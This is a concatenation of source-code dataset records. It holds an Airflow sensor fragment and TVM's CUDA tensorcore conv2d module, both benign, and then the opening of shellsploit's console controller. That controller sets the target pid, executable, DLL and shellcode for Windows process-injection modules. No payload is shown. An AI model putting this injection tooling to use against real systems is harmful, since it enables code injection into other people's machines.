self.log.info("new %s interval is %s", self.mode, new_interval)
return new_interval
else:
return self.poke_interval
@property
def reschedule(self):
return self.mode == 'reschedule'
@property
def deps(self):
if self.reschedule:
return BaseOperator.deps.fget(self) | {ReadyToRescheduleDep()}
return BaseOperator.deps.fget(self)
def poke_mode_only(cls):
def decorate(cls_type):
def mode_getter(_):
return 'poke'
def mode_setter(_, value):
if value != 'poke':
raise ValueError(
f"cannot set mode to 'poke'.")
if not issubclass(cls_type, BaseSensorOperator):
raise ValueError(f"poke_mode_only decorator should only be "
f"applied to subclasses of BaseSensorOperator,"
f" got:{cls_type}.")
cls_type.mode = property(mode_getter, mode_setter)
return cls_type
return decorate(cls)
if 'BUILDING_AIRFLOW_DOCS' in os.environ:
apply_defaults = lambda x: x
| true
| true
|
790db0fe89a04beb0224baffd456de9a966428fd
| 12,782
|
py
|
Python
|
topi/python/topi/cuda/conv2d_nhwc_tensorcore.py
|
retamia/tvm
|
5d25dc54d874bf2ddf0e8cf34c4748e9e2656fd8
|
[
"Apache-2.0"
] | 9
|
2019-12-17T08:03:54.000Z
|
2022-01-19T02:34:23.000Z
|
topi/python/topi/cuda/conv2d_nhwc_tensorcore.py
|
retamia/tvm
|
5d25dc54d874bf2ddf0e8cf34c4748e9e2656fd8
|
[
"Apache-2.0"
] | 2
|
2020-07-08T12:34:59.000Z
|
2020-07-11T15:54:47.000Z
|
topi/python/topi/cuda/conv2d_nhwc_tensorcore.py
|
retamia/tvm
|
5d25dc54d874bf2ddf0e8cf34c4748e9e2656fd8
|
[
"Apache-2.0"
] | 3
|
2020-10-04T20:30:18.000Z
|
2022-01-24T18:03:52.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, too-many-locals, too-many-function-args
# pylint: disable=too-many-statements, unused-argument, too-many-arguments
"""Tensorcore template for cuda backend"""
import numpy as np
import tvm
from tvm import te
from tvm import autotvm
from ..util import get_const_tuple, traverse_inline, simplify
from ..nn.pad import pad
from ..nn.util import get_pad_tuple
from .tensor_intrin import intrin_wmma_load_matrix_A
from .tensor_intrin import intrin_wmma_load_matrix_W
from .tensor_intrin import intrin_wmma_store_matrix
from .tensor_intrin import intrin_wmma_gemm
def nhwc_tensorcore_cuda(cfg, Input, Filter, stride, padding, dilation, out_dtype):
"""Compute declaration for tensorcore"""
assert isinstance(stride, int) or len(stride) == 2
assert isinstance(dilation, int) or len(dilation) == 2
if isinstance(stride, int):
stride_h = stride_w = stride
else:
stride_h, stride_w = stride
if isinstance(dilation, int):
dilation_h = dilation_w = dilation
else:
dilation_h, dilation_w = dilation
batch, in_height, in_width, in_channel = get_const_tuple(Input.shape)
kernel_h, kernel_w, _, num_filter = get_const_tuple(Filter.shape)
assert (batch % 16 == 0 and in_channel % 16 == 0 and num_filter % 16 == 0) or \
(batch % 8 == 0 and in_channel % 16 == 0 and num_filter % 32 == 0) or \
(batch % 32 == 0 and in_channel % 16 == 0 and num_filter % 8 == 0), \
"The shape of (batch, in_channel, num_filter) "\
"must be multiple of (16, 16, 16) or (32, 16, 8) or (8, 16, 32) for now"
# compute the output shape
dilated_kernel_h = (kernel_h - 1) * dilation_h + 1
dilated_kernel_w = (kernel_w - 1) * dilation_w + 1
pad_top, pad_left, pad_down, pad_right = get_pad_tuple(
padding, (dilated_kernel_h, dilated_kernel_w))
out_channel = num_filter
out_height = simplify((in_height - dilated_kernel_h + pad_top + pad_down) // stride_h + 1)
out_width = simplify((in_width - dilated_kernel_w + pad_left + pad_right) // stride_w + 1)
pad_before = [0, pad_top, pad_left, 0]
pad_after = [0, pad_down, pad_right, 0]
PaddedInput = pad(Input, pad_before, pad_after, name="PaddedInput")
rc = te.reduce_axis((0, in_channel), name='rc')
ry = te.reduce_axis((0, kernel_h), name='ry')
rx = te.reduce_axis((0, kernel_w), name='rx')
# convert data type of input feature maps and weights
TransPaddedInput = te.compute(
PaddedInput.shape,
lambda n, h, w, c: PaddedInput[n, h, w, c].astype('float16'))
TransFilter = te.compute(
Filter.shape, lambda h, w, i, o: Filter[h, w, i, o].astype('float16'))
Output = te.compute(
(batch, out_height, out_width, out_channel),
lambda nn, yy, xx, ff: te.sum(
TransPaddedInput[nn, yy * stride_h + ry * dilation_h,
xx * stride_w + rx * dilation_w, rc].astype(out_dtype) *
TransFilter[ry, rx, rc, ff].astype(out_dtype), axis=[ry, rx, rc]),
name="Conv2dOutput", tag="conv2d_nhwc_tensorcore")
return Output
def schedule_nhwc_tensorcore_cuda(cfg, s, Conv):
"""Schedule tensorcore template"""
kh, kw, ic = s[Conv].op.reduce_axis
out_dtype = Conv.dtype
trans_paddata, kernel = s[Conv].op.input_tensors
in_dtype = trans_paddata.dtype
batch, _, _, _ = get_const_tuple(Conv.shape)
_, _, _, out_channels = get_const_tuple(kernel.shape)
paddata = s[trans_paddata].op.input_tensors
# inline the pad and dtype transform
s[trans_paddata].compute_inline()
s[kernel].compute_inline()
s[paddata[0]].compute_inline()
# Designate the memory hierarchy
AS = s.cache_read(trans_paddata, 'shared', [Conv])
WS = s.cache_read(kernel, 'shared', [Conv])
AF = s.cache_read(AS, 'wmma.matrix_a', [Conv])
WF = s.cache_read(WS, 'wmma.matrix_b', [Conv])
ConvF = s.cache_write(Conv, 'wmma.accumulator')
if Conv.op in s.outputs:
output = Conv
ConvS = s.cache_read(ConvF, 'shared', [Conv])
OL = ConvS
else:
output = s.outputs[0].output(0)
s[Conv].set_scope('shared')
OL = Conv
# Schedule for autotvm
cfg.define_knob("block_row_warps", [1, 2, 4])
cfg.define_knob("block_col_warps", [1, 2, 4])
cfg.define_knob("warp_row_tiles", [1, 2, 4])
cfg.define_knob("warp_col_tiles", [1, 2, 4])
cfg.define_knob("chunk", [1, 2, 4, 8])
cfg.define_knob("offset", [0, 8])
cfg.define_knob("vector_width", [1, 2, 4, 8])
if (batch % 16 == 0 and out_channels % 16 == 0):
cfg.define_knob("wmma_m", [16, 8, 32])
elif (batch % 8 == 0 and out_channels % 32 == 0):
cfg.define_knob("wmma_m", [8, 16, 32])
elif (batch % 32 == 0 and out_channels % 8 == 0):
cfg.define_knob("wmma_m", [32, 16, 8])
# fallback support
target = tvm.target.Target.current()
if cfg.is_fallback:
ref_log = autotvm.tophub.load_reference_log(
target.target_name, target.model, 'conv2d_nhwc_tensorcore.cuda')
cfg.fallback_with_reference_log(ref_log)
block_row_warps = cfg["block_row_warps"].val
block_col_warps = cfg["block_col_warps"].val
warp_row_tiles = cfg["warp_row_tiles"].val
warp_col_tiles = cfg["warp_col_tiles"].val
chunk = cfg["chunk"].val
offset = cfg["offset"].val
wmma_m = cfg["wmma_m"].val
vector_width = cfg["vector_width"].val
wmma_k = 16
if wmma_m == 16:
wmma_n = 16
elif wmma_m == 8:
wmma_n = 32
elif wmma_m == 32:
wmma_n = 8
warp_size = 32
block_x = te.thread_axis('blockIdx.x')
block_y = te.thread_axis('blockIdx.y')
block_z = te.thread_axis('blockIdx.z')
thread_x = te.thread_axis('threadIdx.x')
thread_y = te.thread_axis('threadIdx.y')
thread_z = te.thread_axis('threadIdx.z')
# Define the intrin strides
def get_strides(extents):
return [np.prod(extents[i:]).tolist() for i in range(len(extents))]
AS_align = chunk * wmma_k + offset
WS_align = warp_col_tiles * block_col_warps * wmma_n + offset
block_factor_n = wmma_m * warp_row_tiles * block_row_warps
block_factor_o = wmma_n * warp_col_tiles * block_col_warps
CS_align = block_factor_o + offset
AS_strides = get_strides([1, 1, AS_align, 1])
AL_strides = get_strides([1, 1, wmma_k, 1])
WS_strides = get_strides([WS_align, 1])
WL_strides = get_strides([wmma_n * warp_col_tiles, 1])
CL_strides = get_strides([1, 1, wmma_n * warp_col_tiles, 1])
CS_strides = get_strides([1, 1, CS_align, 1])
# Schedule for output
nc, hc, wc, oc = output.op.axis
block_k = s[output].fuse(hc, wc)
s[output].bind(block_k, block_z)
block_i, nc = s[output].split(nc, factor=block_factor_n)
block_j, oc = s[output].split(oc, factor=block_factor_o)
s[output].reorder(block_k, block_i, block_j, nc, oc)
t = s[output].fuse(nc, oc)
t, ti = s[output].split(t, factor=vector_width)
t, tx = s[output].split(t, factor=warp_size)
t, ty = s[output].split(t, factor=block_row_warps)
t, tz = s[output].split(t, factor=block_col_warps)
s[output].bind(block_i, block_x)
s[output].bind(block_j, block_y)
s[output].bind(tz, thread_z)
s[output].bind(ty, thread_y)
s[output].bind(tx, thread_x)
s[output].vectorize(ti)
# Schedule wmma store
s[OL].compute_at(s[output], block_j)
nc, hc, wc, oc = OL.op.axis
s[OL].reorder(hc, wc, nc, oc)
s[OL].storage_align(wc, CS_align - 1, CS_align)
oc, ooc = s[OL].split(oc, factor=wmma_n)
oc, oci = s[OL].split(oc, factor=warp_col_tiles)
_, oc = s[OL].split(oc, factor=block_col_warps)
nc, nnc = s[OL].split(nc, factor=wmma_m)
nc, nci = s[OL].split(nc, factor=warp_row_tiles)
_, nc = s[OL].split(nc, factor=block_row_warps)
s[OL].reorder(nc, oc, nci, oci, nnc, ooc)
s[OL].bind(nc, thread_y)
s[OL].bind(oc, thread_z)
# Schedule wmma computation
s[ConvF].compute_at(s[OL], oc)
n, h, w, o = ConvF.op.axis
n, nnf = s[ConvF].split(n, factor=wmma_m)
o, oof = s[ConvF].split(o, factor=wmma_n)
ic, ii = s[ConvF].split(ic, factor=wmma_k)
ko, ki = s[ConvF].split(ic, factor=chunk)
s[ConvF].reorder(kh, kw, ko, ki, n, o, nnf, oof, ii)
s[AF].compute_at(s[ConvF], ki)
s[WF].compute_at(s[ConvF], ki)
# Schedule wmma load
n, h, w, i = AF.op.axis
n, nn = s[AF].split(n, factor=wmma_m)
i, ii = s[AF].split(i, factor=wmma_k)
s[AF].reorder(n, i, nn, ii)
kh, kw, i, o = WF.op.axis
i, ii = s[WF].split(i, factor=wmma_k)
o, oo = s[WF].split(o, factor=wmma_n)
s[WF].reorder(o, i, oo)
s[WF].reorder(i, o, ii, oo)
s[WS].compute_at(s[ConvF], ko)
s[AS].compute_at(s[ConvF], ko)
# Schedule for data's share memory
n, h, w, i = AS.op.axis
s[AS].reorder(h, w, n, i)
s[AS].storage_align(w, AS_align - 1, AS_align)
t = s[AS].fuse(n, i)
t, ti = s[AS].split(t, factor=vector_width)
t, tx = s[AS].split(t, factor=warp_size)
t, ty = s[AS].split(t, factor=block_row_warps)
_, tz = s[AS].split(t, factor=block_col_warps)
s[AS].bind(ty, thread_y)
s[AS].bind(tz, thread_z)
s[AS].bind(tx, thread_x)
s[AS].vectorize(ti)
# Schedule for kernel's share memory
kh, kw, ic, o = WS.op.axis
t = s[WS].fuse(ic, o)
s[WS].storage_align(ic, WS_align - 1, WS_align)
t, ti = s[WS].split(t, factor=vector_width)
t, tx = s[WS].split(t, factor=warp_size)
t, ty = s[WS].split(t, factor=block_row_warps)
_, tz = s[WS].split(t, factor=block_col_warps)
s[WS].bind(ty, thread_y)
s[WS].bind(tz, thread_z)
s[WS].bind(tx, thread_x)
s[WS].vectorize(ti)
shape = (wmma_m, wmma_n, wmma_k)
# tensorize the wmma process
AS_shape = (wmma_m, 1, 1, wmma_k)
AL_shape = (wmma_m, 1, 1, wmma_k)
WS_shape = (wmma_k, wmma_n)
WL_shape = (wmma_k, wmma_n)
CL_shape = (wmma_m, 1, 1, wmma_n)
CS_shape = (wmma_m, 1, 1, wmma_n)
AL_gemm = te.placeholder(AL_shape, name='A', dtype=in_dtype)
WL_gemm = te.placeholder(WL_shape, name='B', dtype=in_dtype)
k_gemm = te.reduce_axis((0, wmma_k), name="k")
CL_compute = te.compute(CL_shape, lambda ii, t0, t1, jj:
te.sum(AL_gemm[ii, t0, t1, k_gemm].astype(out_dtype) * \
WL_gemm[k_gemm, jj].astype(out_dtype), axis=k_gemm),
name='C')
s[AF].tensorize(nn, intrin_wmma_load_matrix_A(AL_strides, AS_strides, shape,
"row_major", AS_shape, AL_shape, in_dtype))
s[WF].tensorize(ii, intrin_wmma_load_matrix_W(WL_strides, WS_strides, shape,
"row_major", WS_shape, WL_shape, in_dtype))
s[OL].tensorize(nnc, intrin_wmma_store_matrix(CS_strides, CL_strides,
shape, out_dtype, CL_shape, CS_shape))
s[ConvF].tensorize(nnf, intrin_wmma_gemm(AL_gemm, WL_gemm, CL_compute, AL_strides,
WL_strides, CL_strides, shape))
N, OH, OW, CO = get_const_tuple(output.shape)
KH, KW, CI, _ = get_const_tuple(kernel.shape)
cfg.add_flop(2 * N * OH * OW * CO * CI * KH * KW)
@autotvm.register_topi_compute("conv2d_nhwc_tensorcore.cuda")
def conv2d_nhwc_tensorcore(cfg, data, kernel, strides, padding, dilation, out_dtype):
"""Compute conv2d with tensorcore for NCHW layout"""
return nhwc_tensorcore_cuda(cfg, data, kernel, strides, padding, dilation, out_dtype)
@autotvm.register_topi_schedule("conv2d_nhwc_tensorcore.cuda")
def schedule_conv2d_nhwc_tensorcore(cfg, outs):
"""TOPI schedule callback"""
s = te.create_schedule([x.op for x in outs])
def _callback(op):
if 'conv2d_nhwc_tensorcore' in op.tag:
schedule_nhwc_tensorcore_cuda(cfg, s, op.output(0))
traverse_inline(s, outs[0].op, _callback)
return s
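# Editor's note: a hedged, pure-Python worked example of the output-shape
# arithmetic used in nhwc_tensorcore_cuda above; not part of the original
# module, and the sample numbers are hypothetical.
def _conv_out_dim(in_dim, kernel, stride, pad_before, pad_after, dilation=1):
    dilated = (kernel - 1) * dilation + 1
    return (in_dim - dilated + pad_before + pad_after) // stride + 1

# A 56x56 input with a 3x3 kernel, stride 1 and one pixel of padding on each
# side keeps its spatial size: (56 - 3 + 1 + 1) // 1 + 1 == 56.
assert _conv_out_dim(56, 3, 1, 1, 1) == 56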
| 40.068966
| 94
| 0.643561
|
import numpy as np
import tvm
from tvm import te
from tvm import autotvm
from ..util import get_const_tuple, traverse_inline, simplify
from ..nn.pad import pad
from ..nn.util import get_pad_tuple
from .tensor_intrin import intrin_wmma_load_matrix_A
from .tensor_intrin import intrin_wmma_load_matrix_W
from .tensor_intrin import intrin_wmma_store_matrix
from .tensor_intrin import intrin_wmma_gemm
def nhwc_tensorcore_cuda(cfg, Input, Filter, stride, padding, dilation, out_dtype):
assert isinstance(stride, int) or len(stride) == 2
assert isinstance(dilation, int) or len(dilation) == 2
if isinstance(stride, int):
stride_h = stride_w = stride
else:
stride_h, stride_w = stride
if isinstance(dilation, int):
dilation_h = dilation_w = dilation
else:
dilation_h, dilation_w = dilation
batch, in_height, in_width, in_channel = get_const_tuple(Input.shape)
kernel_h, kernel_w, _, num_filter = get_const_tuple(Filter.shape)
assert (batch % 16 == 0 and in_channel % 16 == 0 and num_filter % 16 == 0) or \
(batch % 8 == 0 and in_channel % 16 == 0 and num_filter % 32 == 0) or \
(batch % 32 == 0 and in_channel % 16 == 0 and num_filter % 8 == 0), \
"The shape of (batch, in_channel, num_filter) "\
"must be multiple of (16, 16, 16) or (32, 16, 8) or (8, 16, 32) for now"
dilated_kernel_h = (kernel_h - 1) * dilation_h + 1
dilated_kernel_w = (kernel_w - 1) * dilation_w + 1
pad_top, pad_left, pad_down, pad_right = get_pad_tuple(
padding, (dilated_kernel_h, dilated_kernel_w))
out_channel = num_filter
out_height = simplify((in_height - dilated_kernel_h + pad_top + pad_down) // stride_h + 1)
out_width = simplify((in_width - dilated_kernel_w + pad_left + pad_right) // stride_w + 1)
pad_before = [0, pad_top, pad_left, 0]
pad_after = [0, pad_down, pad_right, 0]
PaddedInput = pad(Input, pad_before, pad_after, name="PaddedInput")
rc = te.reduce_axis((0, in_channel), name='rc')
ry = te.reduce_axis((0, kernel_h), name='ry')
rx = te.reduce_axis((0, kernel_w), name='rx')
TransPaddedInput = te.compute(
PaddedInput.shape,
lambda n, h, w, c: PaddedInput[n, h, w, c].astype('float16'))
TransFilter = te.compute(
Filter.shape, lambda h, w, i, o: Filter[h, w, i, o].astype('float16'))
Output = te.compute(
(batch, out_height, out_width, out_channel),
lambda nn, yy, xx, ff: te.sum(
TransPaddedInput[nn, yy * stride_h + ry * dilation_h,
xx * stride_w + rx * dilation_w, rc].astype(out_dtype) *
TransFilter[ry, rx, rc, ff].astype(out_dtype), axis=[ry, rx, rc]),
name="Conv2dOutput", tag="conv2d_nhwc_tensorcore")
return Output
def schedule_nhwc_tensorcore_cuda(cfg, s, Conv):
kh, kw, ic = s[Conv].op.reduce_axis
out_dtype = Conv.dtype
trans_paddata, kernel = s[Conv].op.input_tensors
in_dtype = trans_paddata.dtype
batch, _, _, _ = get_const_tuple(Conv.shape)
_, _, _, out_channels = get_const_tuple(kernel.shape)
paddata = s[trans_paddata].op.input_tensors
s[trans_paddata].compute_inline()
s[kernel].compute_inline()
s[paddata[0]].compute_inline()
AS = s.cache_read(trans_paddata, 'shared', [Conv])
WS = s.cache_read(kernel, 'shared', [Conv])
AF = s.cache_read(AS, 'wmma.matrix_a', [Conv])
WF = s.cache_read(WS, 'wmma.matrix_b', [Conv])
ConvF = s.cache_write(Conv, 'wmma.accumulator')
if Conv.op in s.outputs:
output = Conv
ConvS = s.cache_read(ConvF, 'shared', [Conv])
OL = ConvS
else:
output = s.outputs[0].output(0)
s[Conv].set_scope('shared')
OL = Conv
cfg.define_knob("block_row_warps", [1, 2, 4])
cfg.define_knob("block_col_warps", [1, 2, 4])
cfg.define_knob("warp_row_tiles", [1, 2, 4])
cfg.define_knob("warp_col_tiles", [1, 2, 4])
cfg.define_knob("chunk", [1, 2, 4, 8])
cfg.define_knob("offset", [0, 8])
cfg.define_knob("vector_width", [1, 2, 4, 8])
if (batch % 16 == 0 and out_channels % 16 == 0):
cfg.define_knob("wmma_m", [16, 8, 32])
elif (batch % 8 == 0 and out_channels % 32 == 0):
cfg.define_knob("wmma_m", [8, 16, 32])
elif (batch % 32 == 0 and out_channels % 8 == 0):
cfg.define_knob("wmma_m", [32, 16, 8])
target = tvm.target.Target.current()
if cfg.is_fallback:
ref_log = autotvm.tophub.load_reference_log(
target.target_name, target.model, 'conv2d_nhwc_tensorcore.cuda')
cfg.fallback_with_reference_log(ref_log)
block_row_warps = cfg["block_row_warps"].val
block_col_warps = cfg["block_col_warps"].val
warp_row_tiles = cfg["warp_row_tiles"].val
warp_col_tiles = cfg["warp_col_tiles"].val
chunk = cfg["chunk"].val
offset = cfg["offset"].val
wmma_m = cfg["wmma_m"].val
vector_width = cfg["vector_width"].val
wmma_k = 16
if wmma_m == 16:
wmma_n = 16
elif wmma_m == 8:
wmma_n = 32
elif wmma_m == 32:
wmma_n = 8
warp_size = 32
block_x = te.thread_axis('blockIdx.x')
block_y = te.thread_axis('blockIdx.y')
block_z = te.thread_axis('blockIdx.z')
thread_x = te.thread_axis('threadIdx.x')
thread_y = te.thread_axis('threadIdx.y')
thread_z = te.thread_axis('threadIdx.z')
def get_strides(extents):
return [np.prod(extents[i:]).tolist() for i in range(len(extents))]
AS_align = chunk * wmma_k + offset
WS_align = warp_col_tiles * block_col_warps * wmma_n + offset
block_factor_n = wmma_m * warp_row_tiles * block_row_warps
block_factor_o = wmma_n * warp_col_tiles * block_col_warps
CS_align = block_factor_o + offset
AS_strides = get_strides([1, 1, AS_align, 1])
AL_strides = get_strides([1, 1, wmma_k, 1])
WS_strides = get_strides([WS_align, 1])
WL_strides = get_strides([wmma_n * warp_col_tiles, 1])
CL_strides = get_strides([1, 1, wmma_n * warp_col_tiles, 1])
CS_strides = get_strides([1, 1, CS_align, 1])
nc, hc, wc, oc = output.op.axis
block_k = s[output].fuse(hc, wc)
s[output].bind(block_k, block_z)
block_i, nc = s[output].split(nc, factor=block_factor_n)
block_j, oc = s[output].split(oc, factor=block_factor_o)
s[output].reorder(block_k, block_i, block_j, nc, oc)
t = s[output].fuse(nc, oc)
t, ti = s[output].split(t, factor=vector_width)
t, tx = s[output].split(t, factor=warp_size)
t, ty = s[output].split(t, factor=block_row_warps)
t, tz = s[output].split(t, factor=block_col_warps)
s[output].bind(block_i, block_x)
s[output].bind(block_j, block_y)
s[output].bind(tz, thread_z)
s[output].bind(ty, thread_y)
s[output].bind(tx, thread_x)
s[output].vectorize(ti)
s[OL].compute_at(s[output], block_j)
nc, hc, wc, oc = OL.op.axis
s[OL].reorder(hc, wc, nc, oc)
s[OL].storage_align(wc, CS_align - 1, CS_align)
oc, ooc = s[OL].split(oc, factor=wmma_n)
oc, oci = s[OL].split(oc, factor=warp_col_tiles)
_, oc = s[OL].split(oc, factor=block_col_warps)
nc, nnc = s[OL].split(nc, factor=wmma_m)
nc, nci = s[OL].split(nc, factor=warp_row_tiles)
_, nc = s[OL].split(nc, factor=block_row_warps)
s[OL].reorder(nc, oc, nci, oci, nnc, ooc)
s[OL].bind(nc, thread_y)
s[OL].bind(oc, thread_z)
s[ConvF].compute_at(s[OL], oc)
n, h, w, o = ConvF.op.axis
n, nnf = s[ConvF].split(n, factor=wmma_m)
o, oof = s[ConvF].split(o, factor=wmma_n)
ic, ii = s[ConvF].split(ic, factor=wmma_k)
ko, ki = s[ConvF].split(ic, factor=chunk)
s[ConvF].reorder(kh, kw, ko, ki, n, o, nnf, oof, ii)
s[AF].compute_at(s[ConvF], ki)
s[WF].compute_at(s[ConvF], ki)
n, h, w, i = AF.op.axis
n, nn = s[AF].split(n, factor=wmma_m)
i, ii = s[AF].split(i, factor=wmma_k)
s[AF].reorder(n, i, nn, ii)
kh, kw, i, o = WF.op.axis
i, ii = s[WF].split(i, factor=wmma_k)
o, oo = s[WF].split(o, factor=wmma_n)
s[WF].reorder(o, i, oo)
s[WF].reorder(i, o, ii, oo)
s[WS].compute_at(s[ConvF], ko)
s[AS].compute_at(s[ConvF], ko)
n, h, w, i = AS.op.axis
s[AS].reorder(h, w, n, i)
s[AS].storage_align(w, AS_align - 1, AS_align)
t = s[AS].fuse(n, i)
t, ti = s[AS].split(t, factor=vector_width)
t, tx = s[AS].split(t, factor=warp_size)
t, ty = s[AS].split(t, factor=block_row_warps)
_, tz = s[AS].split(t, factor=block_col_warps)
s[AS].bind(ty, thread_y)
s[AS].bind(tz, thread_z)
s[AS].bind(tx, thread_x)
s[AS].vectorize(ti)
# Schedule for kernel's share memory
kh, kw, ic, o = WS.op.axis
t = s[WS].fuse(ic, o)
s[WS].storage_align(ic, WS_align - 1, WS_align)
t, ti = s[WS].split(t, factor=vector_width)
t, tx = s[WS].split(t, factor=warp_size)
t, ty = s[WS].split(t, factor=block_row_warps)
_, tz = s[WS].split(t, factor=block_col_warps)
s[WS].bind(ty, thread_y)
s[WS].bind(tz, thread_z)
s[WS].bind(tx, thread_x)
s[WS].vectorize(ti)
shape = (wmma_m, wmma_n, wmma_k)
AS_shape = (wmma_m, 1, 1, wmma_k)
AL_shape = (wmma_m, 1, 1, wmma_k)
WS_shape = (wmma_k, wmma_n)
WL_shape = (wmma_k, wmma_n)
CL_shape = (wmma_m, 1, 1, wmma_n)
CS_shape = (wmma_m, 1, 1, wmma_n)
AL_gemm = te.placeholder(AL_shape, name='A', dtype=in_dtype)
WL_gemm = te.placeholder(WL_shape, name='B', dtype=in_dtype)
k_gemm = te.reduce_axis((0, wmma_k), name="k")
CL_compute = te.compute(CL_shape, lambda ii, t0, t1, jj:
te.sum(AL_gemm[ii, t0, t1, k_gemm].astype(out_dtype) * \
WL_gemm[k_gemm, jj].astype(out_dtype), axis=k_gemm),
name='C')
s[AF].tensorize(nn, intrin_wmma_load_matrix_A(AL_strides, AS_strides, shape,
"row_major", AS_shape, AL_shape, in_dtype))
s[WF].tensorize(ii, intrin_wmma_load_matrix_W(WL_strides, WS_strides, shape,
"row_major", WS_shape, WL_shape, in_dtype))
s[OL].tensorize(nnc, intrin_wmma_store_matrix(CS_strides, CL_strides,
shape, out_dtype, CL_shape, CS_shape))
s[ConvF].tensorize(nnf, intrin_wmma_gemm(AL_gemm, WL_gemm, CL_compute, AL_strides,
WL_strides, CL_strides, shape))
N, OH, OW, CO = get_const_tuple(output.shape)
KH, KW, CI, _ = get_const_tuple(kernel.shape)
cfg.add_flop(2 * N * OH * OW * CO * CI * KH * KW)
@autotvm.register_topi_compute("conv2d_nhwc_tensorcore.cuda")
def conv2d_nhwc_tensorcore(cfg, data, kernel, strides, padding, dilation, out_dtype):
return nhwc_tensorcore_cuda(cfg, data, kernel, strides, padding, dilation, out_dtype)
@autotvm.register_topi_schedule("conv2d_nhwc_tensorcore.cuda")
def schedule_conv2d_nhwc_tensorcore(cfg, outs):
s = te.create_schedule([x.op for x in outs])
def _callback(op):
if 'conv2d_nhwc_tensorcore' in op.tag:
schedule_nhwc_tensorcore_cuda(cfg, s, op.output(0))
traverse_inline(s, outs[0].op, _callback)
return s
| true
| true
|
790db224486fee9e2e6acac2ef44531a3d016a9c
| 44,167
|
py
|
Python
|
shell/control.py
|
dromero1452/shellsploit-framework
|
38ce78542fd2dd2ac30f6567972d695ede1e4709
|
[
"MIT"
] | 2
|
2019-12-23T15:47:02.000Z
|
2020-01-06T09:51:57.000Z
|
shell/control.py
|
badfish5150/shellsploit-framework
|
22bb910d33379ca29ddd10ba93a63e9ff1eab99d
|
[
"MIT"
] | null | null | null |
shell/control.py
|
badfish5150/shellsploit-framework
|
22bb910d33379ca29ddd10ba93a63e9ff1eab99d
|
[
"MIT"
] | 1
|
2021-12-23T16:35:24.000Z
|
2021-12-23T16:35:24.000Z
|
#------------------Bombermans Team---------------------------------#
# Author : B3mB4m
# Contact : b3mb4m@protonmail.com
# Project : https://github.com/b3mb4m/Shellsploit
# LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE
#------------------------------------------------------------------#
import sys
import os
from .core.color import *
from re import findall
from .core.Comp import tab
from lib.base.framework import ShellsploitFramework
if sys.version_info.major >= 3:
raw_input = input
class B3mB4m(ShellsploitFramework):
def __init__(self):
ShellsploitFramework.__init__(self)
self.argvlist = ["None", "None", "None", "None"]
self.disassembly = "None"
self.mycache = "None"
def control(self, string):
bash = bcolors.OKBLUE + bcolors.UNDERLINE + "ssf" + bcolors.ENDC
bash += ":"
bash += bcolors.RED + string + bcolors.ENDC
bash += bcolors.OKBLUE + " > " + bcolors.ENDC
try:
terminal = raw_input(bash)
except KeyboardInterrupt:
B3mB4m.exit("\n[*] (Ctrl + C ) Detected, Trying To Exit ...")
# Injectors
if string[:9] == "injectors":
tab.completion("injectors")
if terminal[:4] == "help":
from .core.help import injectorhelp
injectorhelp()
self.control(string)
elif terminal[:4] == "back":
self.argvlist = ["None", "None", "None", "None"]
pass
# elif terminal[:9] == "need help":
# import XX
# print youtubelink for this module
elif terminal[:4] == "exit":
B3mB4m.exit("\nThanks for using shellsploit !\n")
elif terminal[:4] == "pids":
B3mB4m.pids("wholelist")
self.control(string)
elif terminal[:6] == "getpid":
B3mB4m.pids(None, terminal[7:])
self.control(string)
elif terminal[:5] == "clear":
B3mB4m.clean()
self.control(string)
elif terminal[:5] == "unset":
if string in B3mB4m.bfdlist():
if terminal[6:] == "exe" or terminal[6:] == "file":
self.argvlist[0] = "None"
elif terminal[6:] == "host":
self.argvlist[1] = "None"
elif terminal[6:] == "port":
self.argvlist[2] = "None"
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
elif string == "injectors/Windows/x86/tLsInjectorDLL":
if terminal[6:] == "exe":
self.argvlist[0] = "None"
elif terminal[6:] == "dll":
self.argvlist[1] = "None"
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
elif string == "injectors/Windows/x86/CodecaveInjector":
if terminal[6:] == "exe":
self.argvlist[0] = "None"
elif terminal[6:] == "shellcode":
self.argvlist[1] = "None"
else:
if terminal[6:] == "pid":
self.argvlist[0] = "None"
elif terminal[6:] == "shellcode":
self.argvlist[1] = "None"
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
self.control(string)
elif terminal[:3] == "set":
if string in B3mB4m.bfdlist():
if terminal[4:7] == "exe" or terminal[4:8] == "file":
self.argvlist[0] = terminal[9:]
elif terminal[4:8] == "host":
self.argvlist[1] = terminal[9:]
elif terminal[4:8] == "port":
self.argvlist[2] = terminal[9:]
else:
if not terminal:
self.control(string)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
elif string == "injectors/Windows/x86/tLsInjectorDLL":
if terminal[4:7] == "exe":
self.argvlist[0] = terminal[8:]
elif terminal[4:7] == "dll":
self.argvlist[1] = terminal[8:]
else:
if not terminal:
self.control(string)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
elif string == "injectors/Windows/x86/CodecaveInjector":
if terminal[4:7] == "exe":
self.argvlist[0] = terminal[8:]
elif terminal[4:13] == "shellcode":
self.argvlist[1] = terminal[14:]
else:
if not terminal:
self.control(string)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
else:
if terminal[4:7] == "pid":
self.argvlist[0] = terminal[8:]
elif terminal[4:13] == "shellcode":
if ".txt" in terminal[14:]:
if os.path.isfile(terminal[14:]):
with open(terminal[14:], "r") as shellcode:
cache = shellcode.readlines()
db = ""
                                for x in cache:
db += x.strip().replace('"', "").replace('+', "").strip()
self.argvlist[1] = db
else:
